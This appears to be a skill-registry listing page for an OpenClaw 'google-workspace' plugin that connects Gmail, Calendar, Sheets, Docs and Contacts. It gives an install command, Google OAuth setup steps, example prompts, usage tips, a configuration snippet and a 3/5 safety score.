ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified productivity Safety 3/5

google-workspace

Interact with Google Workspace services - Gmail, Calendar, Contacts, Sheets, and Docs. Send emails, manage calendar events, read/write spreadsheets, create documents, and sync contacts.

Why use this skill?

Integrate Gmail, Calendar, Docs, and Sheets into OpenClaw. Automate your workflow, organize meetings, and handle documents using AI-driven commands.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/google-workspace-ozgdc
Or

What This Skill Does

The google-workspace skill provides a robust interface for OpenClaw to interact with the core Google ecosystem. By integrating Gmail, Calendar, Sheets, and Docs, this skill allows users to automate complex administrative workflows directly from their chat interface. It leverages the official Google API to handle authentication and secure data transmission, enabling the AI to read emails, schedule meetings, manipulate spreadsheets for data analysis, and draft documents.

Installation

To install this skill, run: clawhub install openclaw/skills/skills/hightower6eu/google-workspace-ozgdc.

Before execution, ensure the openclaw-agent is active on your system as specified in the prerequisite documentation. Follow the setup steps to configure your Google Cloud Project: obtain your credentials.json from the Google Cloud Console, enable the necessary APIs (Gmail, Calendar, Sheets, Docs, and People), and ensure the google_auth.py helper script is present in your working directory to manage OAuth tokens.

Use Cases

This skill is designed for power users and professionals who want to reduce context switching. You can use it to summarize long email threads, organize your daily schedule by querying calendar events, export research findings into structured Sheets rows, or generate template-based drafts in Google Docs. It acts as a bridge between your unstructured communications and structured data storage.

Example Prompts

  1. "Check my inbox for any urgent emails from 'HR' received in the last 24 hours and summarize the key action items for me."
  2. "Look at my calendar for tomorrow and tell me if I have enough time for a one-hour focus block between my scheduled meetings."
  3. "Take this project status update and draft a new document in my Drive, then add the summary as a new row in my Project Tracking sheet."

Tips & Limitations

  • Authentication: The first run requires a browser-based OAuth handshake. Ensure your machine has GUI access or valid remote display capabilities for this step.
  • Permissions: The skill uses granular scopes; however, always be mindful that granting access to Gmail and Drive provides the AI with high-level access to your personal information.
  • Limitations: Large-scale operations on Sheets may be subject to Google API rate limits. For heavy document processing, consider breaking tasks into smaller requests.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-google-workspace-ozgdc": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#google-workspace#automation#productivity#gsuite#task-management
Safety Score: 3/5

Flags: network-access, file-read, external-api